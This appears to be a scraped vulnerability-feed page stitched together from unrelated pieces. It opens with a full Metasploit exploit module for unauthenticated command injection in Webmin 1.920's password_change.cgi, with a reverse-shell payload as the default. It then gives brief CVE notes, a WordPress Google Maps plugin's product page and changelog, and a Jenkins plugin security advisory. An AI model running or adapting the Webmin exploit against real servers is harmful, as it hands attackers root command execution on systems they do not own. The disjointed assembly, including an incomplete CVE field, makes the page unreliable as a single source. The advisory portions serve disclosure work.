An issue was discovered in Webmin <=1.920. The parameter old in password_change.cgi contains a command injection vulnerability.

**Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)**

**Platform:****Linux**

**Date:****2019-08-12**

 

 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 
 include Msf::Exploit::Remote::HttpClient
 
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'Webmin 1.920 Unauthenticated RCE',
 'Description' => %q{
 This module exploits a backdoor in Webmin versions 1.890 through 1.920.
 Only the SourceForge downloads were backdoored, but they are listed as
 official downloads on the project's site.
 
 Unknown attacker(s) inserted Perl qx statements into the build server's
 source code on two separate occasions: once in April 2018, introducing
 the backdoor in the 1.890 release, and in July 2018, reintroducing the
 backdoor in releases 1.900 through 1.920.
 
 Only version 1.890 is exploitable in the default install. Later affected
 versions require the expired password changing feature to be enabled.
 },
 'Author' => [
 'AkkuS <Özkan Mustafa Akkuş>' # Discovery & PoC & Metasploit module @ehakkus
 ],
 'License' => MSF_LICENSE,
 'References' =>
 [
 ['CVE', '2019-'],
 ['URL', 'https://www.pentest.com.tr']
 ],
 'Privileged' => true,
 'Payload' =>
 {
 'DisableNops' => true,
 'Space' => 512,
 'Compat' =>
 {
 'PayloadType' => 'cmd'
 }
 },
 'DefaultOptions' =>
 {
 'RPORT' => 10000,
 'SSL' => false,
 'PAYLOAD' => 'cmd/unix/reverse_python'
 },
 'Platform' => 'unix',
 'Arch' => ARCH_CMD,
 'Targets' => [['Webmin <= 1.910', {}]],
 'DisclosureDate' => 'May 16 2019',
 'DefaultTarget' => 0)
 )
 register_options [
 OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/'])
 ]
 end
 
 def peer
 "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
 end
 ##
 # Target and input verification
 ##
 def check
 # check passwd change priv
 res = send_request_cgi({
 'uri' => normalize_uri(target_uri.path, "password_change.cgi"),
 'headers' =>
 {
 'Referer' => "#{peer}/session_login.cgi"
 },
 'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1"
 })
 
 if res && res.code == 200 && res.body =~ /Failed/
 res = send_request_cgi(
 {
 'method' => 'POST',
 'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1",
 'ctype' => 'application/x-www-form-urlencoded',
 'uri' => normalize_uri(target_uri.path, 'password_change.cgi'),
 'headers' =>
 {
 'Referer' => "#{peer}/session_login.cgi"
 },
 'data' => "user=root&pam=&expired=2&old=AkkuS%7cdir%20&new1=akkuss&new2=akkuss" 
 })
 
 if res && res.code == 200 && res.body =~ /password_change.cgi/
 return CheckCode::Vulnerable
 else
 return CheckCode::Safe
 end
 else
 return CheckCode::Safe
 end
 end
 
 ##
 # Exploiting phase
 ##
 def exploit
 
 unless Exploit::CheckCode::Vulnerable == check
 fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
 end
 
 command = payload.encoded
 print_status("Attempting to execute the payload...")
 handler
 res = send_request_cgi(
 {
 'method' => 'POST',
 'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1",
 'ctype' => 'application/x-www-form-urlencoded',
 'uri' => normalize_uri(target_uri.path, 'password_change.cgi'),
 'headers' =>
 {
 'Referer' => "#{peer}/session_login.cgi"
 },
 'data' => "user=root&pam=&expired=2&old=AkkuS%7c#{command}%20&new1=akkuss&new2=akkuss"
 })
 
 end
 end

CVE-2019-15107: Offensive Security’s Exploit Database Archive

An issue was discovered in 3S-Smart CODESYS V3 products. The application may utilize non-TLS based encryption, which results in user credentials being insufficiently protected during transport. All variants of the following CODESYS V3 products in all versions containing the CmpUserMgr component are affected regardless of the CPU type or operating system: CODESYS Control for BeagleBone, CODESYS Control for emPC-A/iMX6, CODESYS Control for IOT2000, CODESYS Control for Linux, CODESYS Control for PFC100, CODESYS Control for PFC200, CODESYS Control for Raspberry Pi, CODESYS Control RTE V3, CODESYS Control RTE V3 (for Beckhoff CX), CODESYS Control Win V3 (also part of the CODESYS Development System setup), CODESYS V3 Simulation Runtime (part of the CODESYS Development System), CODESYS Control V3 Runtime System Toolkit, CODESYS HMI V3.

CVE-2019-9013

The events-manager plugin before 5.6 for WordPress has code injection.

CVE-2015-9298: Events Manager

The ultimate-member plugin before 1.3.18 for WordPress has XSS via text input.

CVE-2015-9304: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

The wp-google-map-plugin plugin before 3.1.2 for WordPress has XSS.

* Details
* Reviews
* Installation
* Development

The most advanced yet easy to use Google maps plugin for WordPress. Create beautifully styled, modern & responsive google maps with multiple locations, custom marker icons, marker categories, custom infowindow messages, images and more. Enable marker category filter on frontend to allow users to filter the locations.

> 👉 Create multiple google maps with different marker icons, marker categories and locations assigned to them. 
> 👉 All of the best web practices applied to make google maps load faster.

With just few clicks, you will be able to add beautifully designed custom google maps to any page / post or widget with help of generated shortcode.

Contact Dedicated Support team for setup configurations needs or for any other assistance.

Google autosuggest enabled location form helps you as site administrator to create unlimited markers and then assign these markers to a google map. It’s super easy.

> Here is a quick highlight on the numerous customizable features offered by the free and pro versions of the **WP MAPS PRO Version**.

**Lite Version (Free)**

> ➡️ Create multiple google maps with different marker icons, marker categories and locations assigned to them. 
> ➡️ Add unlimited locations with various information. 
> ➡️ Assign multiple locations to a single google maps. 
> ➡️ Display a info window message to any location. 
> ➡️ Maps Marker Infowindow Open On: Mouse Click or Mouse Hover. 
> ➡️ Display Google Maps on posts/pages using shortcode. 
> ➡️ Centering the map according to assigned locations. 
> ➡️ Decide center latitude and longitude for each map separtely. 
> ➡️ Easy way to assign category to any location. 
> ➡️ Select your marker icon for markers. 
> ➡️ Enable marker cluster functionality for markers. 
> ➡️ Easily edit or delete google map functionality. 
> ➡️ Assign your own markers to categories or choose colorful markers from +500 readymade markers provided by the Maps Icons Collection. 
> ➡️ Select among 4 map type : Roadmap,Satellite,Hybrid,Terrain 
> ➡️ Set your map height and width. 
> ➡️ Set Google maps zoom level. 
> ➡️ Google Maps can be Draggable 
> ➡️ Display traffic real time conditions and overlays using Layers. 
> ➡️ Add bicycle path information to your maps using the Bicycling Layer. 
> ➡️ Enable Google Map Transit layer 
> ➡️ Marker Animation on Click or Mouse hover the marker. 
> ➡️ 45° imagery functionality 
> ➡️ Add circle in your Maps plugin 
> ➡️ Create a Google maps just in seconds. 
> ➡️ Street view supported 
> ➡️ widget supportive : Display Google Maps on sidebars using widget. 
> ➡️ Pov Heading and Pov Pitch for street view. 
> ➡️ Fully Responsive.Display your map perfectly on all devices. 
> ➡️ Create 100% responsive maps effortlessly.Tested on real devices. 
> ➡️ A Cross Browser Compatible plugin. Fully tested on IE8, IE9, IE10 and all major browsers 
> ➡️ Multi-lingual Supported. 
> ➡️ Multisite Enabled and ability to activate it network wide. 
> ➡️ Map Stylization : Customizable Google maps style from https://snazzymaps.com. 
> ➡️ Search control on frontend map to search location easily. 
> ➡️ Filter markers by category. 
> ➡️ No content / data loss when migrating from free version to pro version.

**Additional Features Available In Pro**

WP MAPS PRO

Pro version plugin contains all the features of free version plugin plus some additional features which are listed below

> 👉 Listing : Display listing in grid or list style under map. Fully responsive listing. 
> 👉 Map Layers : Display Traffic Layer , Bicycling Layer, Transit layer 
> 👉 Import/Export Locations : Import Export Locations supported using CSV.Sample csv is attached in pro version. 
> 👉 Draw shapes : rectangle, circle, polygon and polyline. 
> 👉 Display unlimited shapes. Display Message on shape click or Redirect to external link. 
> 👉 Direction & Route : Directions & Route Suggestion. Display directions results in KM and MILES. 
> 👉 Sort listing by location, category and address alphabetically in location listing. 
> 👉 Marker Category : Assign multiple categories to a location. 
> 👉 Infowindow Contents: Customize infowindow contents with help of Placeholders. 
> 👉 Display Posts Information, custom fields, taxonomies and featured images on infowindow message using placeholders. 
> 👉 Unlimited number of map markers and locations. 
> 👉 Set your own google map marker icon 
> 👉 Drag and drop feature for markers, custom animation support 
> 👉 Allows to display the user location on map. 
> 👉 Nearby locations based on user’s current location. 
> 👉 Display Posts/Pages or Custom Post Types on google maps using **custom fields**. 
> 👉 Center the map based on visitor’s current location. 
> 👉 Define overlays on Google maps via an easy to use interface. 
> 👉 Integrate GEOJSON in to google maps. 
> 👉 Display multiple Kml/Kmz Layer on the map. 
> 👉 Fusion Table Layers. 
> 👉 Add Geo location 
> 👉 Add any number of Google maps on pages/posts/sidebars. 
> 👉 Allows to insert the map as widget on sidebars. 
> 👉 Add unlimited locations using an easy to use interface for Google Maps. 
> 👉 Display location title, location category, location latitude, location longitude with location message in the infowindow. 
> 👉 Create unlimited maps and display on posts/pages using shortcode or in sidebar using widget. 
> 👉 Design your own Google map skins easily. Turn ON/OFF roads, places, water area. 
> 👉 Ability to display infowindow on mouse click on mouse hover. 
> 👉 Display your map perfectly on all devices. Create 100% responsive maps effortlessly. 
> 👉 Multi-lingual Supported. 
> 👉 Display physical maps based on terrain information. 
> 👉 Display Google Earth satellite images on just one click. 
> 👉 Display maps in a blend of normal and satellite views. 
> 👉 Setup POV Heading and POV Pitch of Street View to customize Street View output of a location. 
> 👉 Full support of controls of the Google map, such as zoom control, map type control, scale control, street view control, fullscreen and rotate control 
> 👉 Drag and drop feature for markers, custom animation support 
> 👉 Modify Locating Listing using Placeholder. 
> 👉 Hooks Supported – Use actions & filters to modify map,markers,listing and associated html on fly. 
> 👉 Display locations listing with filters & pagination. Fully customizable using backend settings and hooks. 
> 👉 Use “wpgmp\_geo\_tags\_args”, “wpgmp\_geo\_featured\_image”, “wpgmp\_geotags\_placeholder”, “wpgmp\_geotags\_content” hooks to extend Posts on google maps functionality as you want. 
> 👉 Use External Database or Sources to add markers on google maps using new filter wpgmp\_marker\_source. 
> 👉 Load markers from external database or API sources with help of filters (Hooks). 
> 👉 A Cross Browser Compatible plugin. Fully tested on IE8, IE9, IE10 and all major browsers 
> 👉 Multisite Enabled and ability to activate it network wide. 
> 👉 Visit our Pro Edition WP MAPS PRO 
> 👉 Fully extensible & scalable plugin to make it ready for customisations according to website / business requirements.

**Live Examples**

* WP MAPS PRO LIVE DEMOS

**Links**

Upgrade to Pro | 
Live Examples | 
Developed by flippercode

This section describes how to install the plugin and get it working.

 1. Upload the wp-google-map-plugin directory to the /wp-content/plugins/ folder
 
 2. Once the plugin is uploaded log into WordPress and go to Plugins
 
 3. Find the wp-google-map-pluginplugin and click Activate Plugin
 
 =How to work=
 
 1. Go to settings page of plugin and insert your google maps api key. see full instruction [How to create Api key](https://www.wpmapspro.com/docs/how-to-create-an-api-key/)
 
 2. First create your locations using 'Add Location' page.
 
 3. Then create your first map using 'Add Map' page and assign your locations.
 
 4. Each map is assoicated to a shortcode. You can view shortcode on 'Manage Maps' and copy and paste it on your pages or posts. You can display your google maps in the sidebar using widget. 
 

**Documentation**

* Get Started

**Can I create a custom marker ?**

Yes, you can upload your own marker image or you can choose from readymade icons.

**Do I need to calculate latitude & longitude myself ?**

No, Address field is google autosuggest enabled so you just start typing and choose your address. Latitude & Longitude will be calculated automatically.

**How many locations I can assign to the map?**

You can assign as many as location you want to display on google maps.

**How to display map on page?**

Go to ‘Manage Maps’ and copy the shortcode for your map. Each map will have own shortcode. You just paste that on your page.

**Can I display map using widget?**

Yes, First create your map and then you can display your map in sidebar from widget section.

**How to register google maps api key?**

Go to \[Google Maps API console\] 
(https://console.developers.google.com/flows/enableapi?apiid=maps\_backend,geocoding\_backend,directions\_backend,distance\_matrix\_backend,elevation\_backend,places\_backend&keyType=CLIENT\_SIDE&reusekey=true&pli=1) 
and you can create your google maps api key here.

We have a guide \[Important Changes in Google Maps\] 
(https://console.developers.google.com/flows/enableapi?apiid=maps\_backend,geocoding\_backend,directions\_backend,distance\_matrix\_backend,elevation\_backend,places\_backend&keyType=CLIENT\_SIDE&reusekey=true)

**How to upgrade to pro version?**

You can purchase WP MAPS PRO and then just keep your lite version deactivated and then activate the pro version. You’ll not loss any of your data. Your all data will be migrated to pro version automatically.

**Do we have Live Demo?**

Yes, You can click on WP MAPS PRO LIVE DEMOS and mail us at hello at flippercode dot com if any pre-purchase query.

**Do we have a Documentation?**

Yes, You can click on WP MAPS PRO TUTORIALS and you will get all documentation with proper steps and video tutorials.

**Do we have offer refund?**

Yes, You can get refund any time if pro version is not suitable for you.

**Do we have offer customization?**

Yes, You can mail us your requirement at hello at flippercode dot com.

Been looking for a free plugin where you can customize the map and add your own marker for a while. This plugin does all that and the support is really good.

Active support, reacts fast to fix the problem, which is good. Makes this plugin a good choice, actively maintained.

WP MAPS had a display bug on my website. Flippercode support intervened very quickly, and was able to solve the problem in less than 24 hours, thank you very much!

My all time favourite maps plugin! Good Work!

Quick fix with a bug on lower versions of PHP

Read all 112 reviews

“WordPress Plugin for Google Maps – WP MAPS” is open source software. The following people have contributed to this plugin.

Contributors

* Flipper Code

**4.4.2**

* Fix : Callback function required error notice by google fixed.

**4.4.1**

* Fix : Warnings and notices related to infowindow fixed.

**4.4.0**

* Fix : Security issuse related to \[display\_map\] shortcode fixed.

**4.3.9**

* New : Centering the map according to assigned locations.

**4.3.8**

* New : Multiple design templates added for marker infowindow.
* New : Upload custom image for each location and display it inside infowindow with help of new placeholder.

**4.3.7**

* Fix : Category filter issue fixed.
* New : Marker cluster functionality added.

**4.3.6**

* Fix : The delete pop-up is displayed now.

**4.3.5**

* Fix : Plugin code optimised.

**4.3.4**

* New : Snazzy Maps settings readded.

**4.3.3**

* New : Compatibility Issue with PHP 7.2 Resolved

**4.3.2**

* New : Plugin name updated according to released guidelines.

**4.3.1**

* New : Code Improvements.

**4.3.0**

* New : Link for API key generation process through wizard updated.

**4.2.9**

* New : Google Maps API key link updated on add map and add location page.

**4.2.8**

* New : How to use page updated with new google maps console link.

**4.2.7**

* Fix : Broken link fixed.

**4.2.6**

* New : Displayed dynamic google map API key HTTP referrer in the backend, which will be needed in API key creation process.
* New : Added review collection notice for the plugin.

**4.2.5**

* Fix : Infowindow HTML tags were stripping while updating the map.

**4.2.4**

* Fix : Confirmation popup added on bulk delete action for category,location and map.
* Fix : Security issue fixed for delete and copy map operation.

**4.2.3**

* Fix : ‘Select Category’ text displayed in marker category filter dropdown is now translatable.
* Fix : Fixed a logical validation issue on Add location form in back-end.

**4.2.2**

* Fix : UI issues of map controls caused by currently activated theme fixed.

**4.2.1**

* Fix : Warnings removed from frontend when map is deleted from backend.

**4.2.0**

* New : Confirmation boxes added before deleting locations / marker categories / maps.
* New : Addons introduction page updated.

**4.1.9**

* Fix : One warning and one notice fixed on add map page, code optimised.

**4.1.8**

* New : Dismissable notice to buy premium version plugin added.

**4.1.7**

* New : Better UI interface for backend forms.

**4.1.6**

* Fix: Calling files remotely fixed. Removed shorthand URLs. Text domain corrected. WordPress tested upto version number updated. Data sanitisation & escaping work done. Unused code removed. Design issue fixed on manage location and manage maps page. New filter added.

**4.1.5**

* Fix: SQL vulnerability issue fixed.

**4.1.4**

* Fix: SQL security issue fixed.

**4.1.3**

* New: New hooks added before and after map rendering.
* New: Extentions related information provided.

**4.1.2**

* Fix: Missing translation files added.

**4.1.1**

* New: Search control on map for easy location searching.
* New: Filter markers by category.

**4.1.0**

* Fix: Removed reported vulnerability. Updated code in data save modules and applied more security.
* New: Display google maps in different beautiful skins. Snazzy maps support integrated.

**4.0.9**

* Fix: Removed PHP Warnings and coding standard updated.

**4.0.8**

* Fix: Broken link fixed.

**4.0.7**

* Fix: Optimized CSS and removed unused CSS, Files and Code.

**4.0.6**

* Fix: Optimized CSS and removed unused CSS, Files and Code.

**4.0.3**

* Fix: Removed unused file.

**4.0.2**

* Fix: call\_user\_func\_array is resolved.

**4.0.1**

* Fix: Blank Page on Add Map is fixed.

**4.0.0**

* Improvement: New UI for Backend Pages and Forms.
* New: Ability to customize info window message using placeholder.
* New: Ability to show info window on click or mouseover.
* New: Set default marker icon for the map.

**3.2.0**

* Security Fix: Security vulnerablity is resolved.

**3.1.6**

* Improvement Fix: How to use plugin instruction added.

**3.1.5**

* Improvement Fix: CSS fixed for wordpress 4.6.

**3.1.4**

* Improvement Fix: Missing google maps api key notification added on location page.

**3.1.3**

* Fix: Indexed Warning is resolved in class.initial-core.php.

**3.1.2**

* Fix: XSS Vulnerability is resolved.

**3.1.1**

* Fix – Access level to WP\_List\_Table\_Helper::pagination() must be public.

**3.1.0**

* New – resize\_map() function is added to correct the grey map in tabs issue.
* Improvement – Remove directory reading functions.

**3.0.9**

* Multi-site bug resolved.

**3.0.5**

* Lang slug changed to wp-google-map-plugin as per wordpress.org requested.

**3.0.4**

* links in the info window is broken due to missing stripslashes function – resolved.

**3.0.3**

* wpgmp\_admin\_overview capability added to read how to use instructions.

**3.0.2**

* echo $before\_widget and $after\_widget added for correct widget output.

**3.0.1**

* Category icon broken issue resolved.
* Markers are not displaying on the map, issue resolved.
* Infowindow Message is not showing on marker click, issue resolved.

**3.0.0**

* Sanitize all inputs and outputs.
* New file & folder structure.
* Object oriented based coding according to wordpress standard coding rules.
* Clean bootstrap based design.
* Ability to show any number of google maps on a single map.
* Decide center latitude and longitude for each map.
* POV Heading and Pov Pitch for street view.
* Sub categories supported.
* Redirect to URL on marker click.
* City, State, Country and Postal code new fields in location form.
* Apply marker animation.
* Position google maps controls e.g Pan,Zoom,May Type with easy to use interface.

**2.3.10**

* CSRF Protection added on add/edit location.
* CSRF Protection added on add/edit map.
* CSRF Protection added on add/edit category.

**2.3.9**

* Display more than 10 locations on Manage Locations using Screen Options.
* Display more than 10 maps on Manage Categories using Screen Options.
* Display more than 10 categories on Manage Maps using Screen Options.
* SSL Supported.

**2.3.8**

* locations, maps and category was not showing on manage pages in wordpress 4.2 resolved.

**2.3.7**

* Improvement Fix: Fixed add\_query\_arg() and remove\_query\_arg() usage to avoid XSS Vulnerability.

**2.2.0**

* Twitter Bootstrap 3 Based.
* Solved Featured Image Problem.

**2.1.0**

* Infowindow CSS Improved.
* Optimized Code for Fast Map Experience.
* Solved Layer Display Problem.

**1.2.0**

* Zero Configuration Enabled.
* Managed Navigation.
* Custom Icon using Widget.

**1.1.0**

* Solved zoom toolbar bug.
* Solved white lines on the map.
* Added Widget Support.
* Added multiple maps on a page support.

CVE-2016-10878: WordPress Plugin for Google Maps – WP MAPS

The wp-ultimate-csv-importer plugin before 3.8.1 for WordPress has XSS.

CVE-2015-9306: Import All Pages, Post types, Products, Orders, and Users as XML & CSV

The FV Flowplayer Video Player plugin before 7.3.14.727 for WordPress allows email subscription XSS.

CVE-2019-14799: FV Flowplayer Video Player

The Tribulant Newsletters plugin before 4.6.19 for WordPress allows XSS via the wp-admin/admin-ajax.php?action=newsletters_load_new_editor contentarea parameter.

CVE-2019-14787: Newsletters

In radare2 before 3.7.0, a command injection vulnerability exists in bin_symbols() in libr/core/cbin.c. By using a crafted executable file, it's possible to execute arbitrary shell commands with the permissions of the victim. This vulnerability is due to improper handling of symbol names embedded in executables.

CVE-2019-14745: Release r2-3.7.0 - Codename TopHat · radareorg/radare2

A session fixation vulnerability in Jenkins Gitlab Authentication Plugin 1.4 and earlier in GitLabSecurityRealm.java allows unauthorized attackers to impersonate another user if they can control the pre-authentication session.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Avatar Plugin
*   Build Pipeline Plugin
*   Codefresh Integration Plugin
*   Configuration as Code Plugin
*   eggplant-plugin Plugin
*   File System SCM Plugin
*   Google Cloud Messaging Notification Plugin
*   GitLab Authentication Plugin
*   JClouds Plugin
*   Mask Passwords Plugin
*   PegDown Formatter Plugin
*   Relution Enterprise Appstore Publisher Plugin
*   Simple Travis Pipeline Runner Plugin
*   TestLink Plugin
*   VMware Lab Manager Slaves Plugin
*   Wall Display Master Project Plugin
*   XL TestView Plugin

**Descriptions****Configuration as Code Plugin failed to mask secrets in system log messages**

**SECURITY-1497 / CVE-2019-10367**  
**Severity (CVSS):** Medium  
**Affected plugin: configuration-as-code**  
**Description:**

Configuration as Code Plugin logs the changes it applies to the Jenkins system log. Secrets such as passwords should be masked (i.e. replaced with asterisks) in that log to prevent accidental disclosure. Configuration as Code Plugin inspects the type and looks for a field, getter, or constructor argument corresponding to the property, making the secret detection much more robust for the purpose of log message masking. This was implemented in the fix for SECURITY-1279 in the 2019-07-31 security advisory.

That fix was incomplete and did not cover a log message written to the logger io.jenkins.plugins.casc.impl.configurators.DataBoundConfigurator.

Configuration as Code Plugin now uses the same secret detection for these log messages.

As a workaround, administrators can configure the logging level of the logger io.jenkins.plugins.casc.impl.configurators.DataBoundConfigurator to a level that does not include these messages. Configuration as Code Plugin 1.25 and earlier logs these messages at the INFO level, Configuration as Code Plugin 1.26 logs them at FINE. See the logging documentation for details.

**CSRF vulnerability and missing permission check in JClouds Plugin allowed capturing credentials**

**SECURITY-1482 / CVE-2019-10368 (CSRF), CVE-2019-10369 (permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: jclouds-jenkins**  
**Description:**

JClouds Plugin did not perform permission checks on a method implementing form validation. This allowed users with Overall/Read access to Jenkins to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Additionally, this form validation method did not require POST requests, resulting in a cross-site request forgery vulnerability.

This form validation method now requires POST requests and Overall/Administer permission.

**Mask Passwords Plugin shows plain text passwords in global configuration form fields**

**SECURITY-157 / CVE-2019-10370**  
**Severity (CVSS):** Low  
**Affected plugin: mask-passwords**  
**Description:**

Mask Passwords Plugin allows specifying passwords to be provided to builds in the global Jenkins configuration.

While the passwords are stored encrypted on disk, they are transmitted in plain text as part of the configuration form. This can result in exposure of the password through browser extensions, cross-site scripting vulnerabilities, and similar situations.

As of publication of this advisory, there is no fix.

**HTTP session fixation vulnerability in GitLab Authentication Plugin**

**SECURITY-795 / CVE-2019-10371**  
**Severity (CVSS):** Medium  
**Affected plugin: gitlab-oauth**  
**Description:**

GitLab Authentication Plugin does not invalidate the previous session and create a new one upon successful login. This allows attackers able to control or obtain another user’s pre-login session ID to impersonate them.

As of publication of this advisory, there is no fix.

**Open redirect vulnerability in GitLab Authentication Plugin**

**SECURITY-796 / CVE-2019-10372**  
**Severity (CVSS):** Medium  
**Affected plugin: gitlab-oauth**  
**Description:**

GitLab Authentication Plugin records the HTTP Referer header when the authentication process starts and redirects users to that URL when the user has finished logging in.

This implements an open redirect, allowing malicious sites to implement a phishing attack, with users expecting they have just logged in to Jenkins.

As of publication of this advisory, there is no fix.

**Stored XSS vulnerability in Build Pipeline Plugin**

**SECURITY-879 / CVE-2019-10373**  
**Severity (CVSS):** Medium  
**Affected plugin: build-pipeline-plugin**  
**Description:**

Build Pipeline Plugin does not properly escape variables in views, resulting in a stored cross-site scripting vulnerability exploitable by users with permission to configure build pipelines.

As of publication of this advisory, there is no fix.

**Stored XSS vulnerability in PegDown Formatter Plugin**

**SECURITY-142 / CVE-2019-10374**  
**Severity (CVSS):** Medium  
**Affected plugin: pegdown-formatter**  
**Description:**

PegDown Formatter Plugin uses the PegDown library to implement support for rendering Markdown formatted descriptions in Jenkins. It advertises disabling of HTML to prevent cross-site scripting (XSS) as a feature.

PegDown Formatter Plugin does not prevent the use of javascript: scheme in URLs for links. This results in an XSS vulnerability exploitable by users able to configure entities with descriptions or similar properties that are rendered by the configured markup formatter.

As of publication of this advisory, there is no fix.

**Arbitrary file read vulnerability in File System SCM Plugin**

**SECURITY-569 / CVE-2019-10375**  
**Severity (CVSS):** Medium  
**Affected plugin: filesystem_scm**  
**Description:**

File System SCM Plugin allows users able to configure jobs to read arbitrary files from the Jenkins controller, even if the job is running on an agent.

As of publication of this advisory, there is no fix.

**Reflected XSS vulnerability in Wall Display Master Project Plugin**

**SECURITY-751 / CVE-2019-10376**  
**Severity (CVSS):** Medium  
**Affected plugin: jenkinswalldisplay**  
**Description:**

Wall Display Master Project Plugin does not properly escape the customTheme query parameter, resulting in a reflected cross-site scripting vulnerability.

As of publication of this advisory, there is no fix.

**Avatar Plugin allows changing other users' avatars**

**SECURITY-1099 / CVE-2019-10377**  
**Severity (CVSS):** Medium  
**Affected plugin: avatar**  
**Description:**

Avatar Plugin does not implement a permission check for the HTTP URL used to replace user avatars. This allows any user with Overall/Read permission to change any other user’s avatar, in addition to their own.

As of publication of this advisory, there is no fix.

**TestLink Plugin stores credentials in plain text**

**SECURITY-1428 / CVE-2019-10378**  
**Severity (CVSS):** Low  
**Affected plugin: testlink**  
**Description:**

TestLink Plugin stores credentials unencrypted in its global configuration file hudson.plugins.testlink.TestLinkBuilder.xml on the Jenkins controller. These credentials can be viewed by users with access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Google Cloud Messaging Notification Plugin stores credentials in plain text**

**SECURITY-591 / CVE-2019-10379**  
**Severity (CVSS):** Low  
**Affected plugin: gcm-notification**  
**Description:**

Google Cloud Messaging Notification Plugin stores an API key unencrypted in its global configuration file org.jenkinsci.plugins.gcm.im.GcmPublisher.xml on the Jenkins controller. These credentials can be viewed by users with access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Script sandbox bypass vulnerability in Simple Travis Pipeline Runner Plugin**

**SECURITY-922 / CVE-2019-10380**  
**Severity (CVSS):** High  
**Affected plugin: simple-travis-runner**  
**Description:**

Simple Travis Pipeline Runner Plugin defines a custom list of pre-approved signatures for scripts protected by the Script Security sandbox.

This custom list of pre-approved signatures allows the use of methods that can be used to bypass Script Security sandbox protection. This results in arbitrary code execution on any Jenkins instance with this plugin installed.

As of publication of this advisory, there is no fix.

**Codefresh Integration Plugin globally and unconditionally disables SSL/TLS certificate validation**

**SECURITY-931 / CVE-2019-10381**  
**Severity (CVSS):** Medium  
**Affected plugin: codefresh**  
**Description:**

Codefresh Integration Plugin unconditionally disables SSL/TLS certificate validation for the entire Jenkins controller JVM.

As of publication of this advisory, there is no fix.

**VMware Lab Manager Slaves Plugin globally and unconditionally disables SSL/TLS certificate validation**

**SECURITY-1376 / CVE-2019-10382**  
**Severity (CVSS):** Medium  
**Affected plugin: labmanager**  
**Description:**

VMware Lab Manager Slaves Plugin unconditionally disables SSL/TLS certificate validation for the entire Jenkins controller JVM.

As of publication of this advisory, there is no fix.

**eggplant-plugin Plugin stores credentials in plain text**

**SECURITY-1430 / CVE-2019-10385**  
**Severity (CVSS):** Medium  
**Affected plugin: eggplant-plugin**  
**Description:**

eggplant-plugin Plugin stores credentials unencrypted in job config.xml files on the Jenkins controller. These credentials can be viewed by users with Extended Read permission, or access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**CSRF vulnerability and missing permission check in XL TestView Plugin allow capturing credentials**

**SECURITY-1008 / CVE-2019-10386 (CSRF), CVE-2019-10387 (permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: xltestview-plugin**  
**Description:**

XL TestView Plugin does not perform permission checks on a method implementing form validation. This allows users with Overall/Read access to Jenkins to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Additionally, this form validation method does not require POST requests, resulting in a cross-site request forgery vulnerability.

As of publication of this advisory, there is no fix.

**CSRF vulnerability and missing permission check in Relution Enterprise Appstore Publisher Plugin allow SSRF**

**SECURITY-1053 / CVE-2019-10388 (CSRF), CVE-2019-10389 (permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: relution-publisher**  
**Description:**

A missing permission check in a form validation method in Relution Enterprise Appstore Publisher Plugin allows users with Overall/Read permission to initiate a connection test to an attacker-specified URL using attacker-specified credentials and attacker-specified HTTP proxy configuration.

Additionally, the form validation method does not require POST requests, resulting in a CSRF vulnerability.

As of publication of this advisory, there is no fix.

**Severity**

*   SECURITY-142: Medium
*   SECURITY-157: Low
*   SECURITY-569: Medium
*   SECURITY-591: Low
*   SECURITY-751: Medium
*   SECURITY-795: Medium
*   SECURITY-796: Medium
*   SECURITY-879: Medium
*   SECURITY-922: High
*   SECURITY-931: Medium
*   SECURITY-1008: Medium
*   SECURITY-1053: Medium
*   SECURITY-1099: Medium
*   SECURITY-1376: Medium
*   SECURITY-1428: Low
*   SECURITY-1430: Medium
*   SECURITY-1482: Medium
*   SECURITY-1497: Medium

**Affected Versions**

*   **Avatar Plugin** up to and including 1.2
*   **Build Pipeline Plugin** up to and including 1.5.8
*   **Codefresh Integration Plugin** up to and including 1.8
*   **Configuration as Code Plugin** up to and including 1.26
*   **eggplant-plugin Plugin** up to and including 2.2
*   **File System SCM Plugin** up to and including 2.1
*   **Google Cloud Messaging Notification Plugin** up to and including 1.0
*   **GitLab Authentication Plugin** up to and including 1.4
*   **JClouds Plugin** up to and including 2.14
*   **Mask Passwords Plugin** up to and including 2.12.0
*   **PegDown Formatter Plugin** up to and including 1.3
*   **Relution Enterprise Appstore Publisher Plugin** up to and including 1.24
*   **Simple Travis Pipeline Runner Plugin** up to and including 1.0
*   **TestLink Plugin** up to and including 3.16
*   **VMware Lab Manager Slaves Plugin** up to and including 0.2.8
*   **Wall Display Master Project Plugin** up to and including 0.6.34
*   **XL TestView Plugin** up to and including 1.2.0

**Fix**

*   **Configuration as Code Plugin** should be updated to version 1.27
*   **JClouds Plugin** should be updated to version 2.15

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   Avatar Plugin
*   Build Pipeline Plugin
*   Codefresh Integration Plugin
*   eggplant-plugin Plugin
*   File System SCM Plugin
*   Google Cloud Messaging Notification Plugin
*   GitLab Authentication Plugin
*   Mask Passwords Plugin
*   PegDown Formatter Plugin
*   Relution Enterprise Appstore Publisher Plugin
*   Simple Travis Pipeline Runner Plugin
*   TestLink Plugin
*   VMware Lab Manager Slaves Plugin
*   Wall Display Master Project Plugin
*   XL TestView Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:
